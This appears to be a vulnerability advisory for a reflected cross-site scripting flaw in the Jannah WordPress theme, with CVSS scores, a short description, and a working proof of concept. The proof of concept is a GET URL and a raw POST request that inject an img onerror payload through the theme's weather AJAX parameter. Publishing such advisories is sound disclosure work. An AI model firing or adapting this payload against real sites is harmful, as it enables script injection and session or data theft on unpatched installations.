Truoc PhanWPEX-ID:1D53FBE5-A879-42CA-A9D3-768A80018382Jannah < 5.4.4 - Reflected Cross-Site Scripting (XSS)
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
The theme did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
via GET: https://jannah.tielabs.com/demo/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B'location'%3A'Cairo'%2C'units'%3A'C'%2C'forecast_days'%3A'5\"><img+src=x+onerror=alert(document.domain)>'%2C'custom_name'%3A'Cairo'%2C'animated'%3A'true'%7D
via POST:
POST /demo/wp-admin/admin-ajax.php HTTP/1.1
Host: jannah.tielabs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 195
Connection: close
action=tie_get_user_weather&options=%7B'location'%3A'Cairo'%2C'units'%3A'C'%2C'forecast_days'%3A'5\"><img+src=x+onerror=alert(document.domain)>'%2C'custom_name'%3A'Cairo'%2C'animated'%3A'true'%7DRelated
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N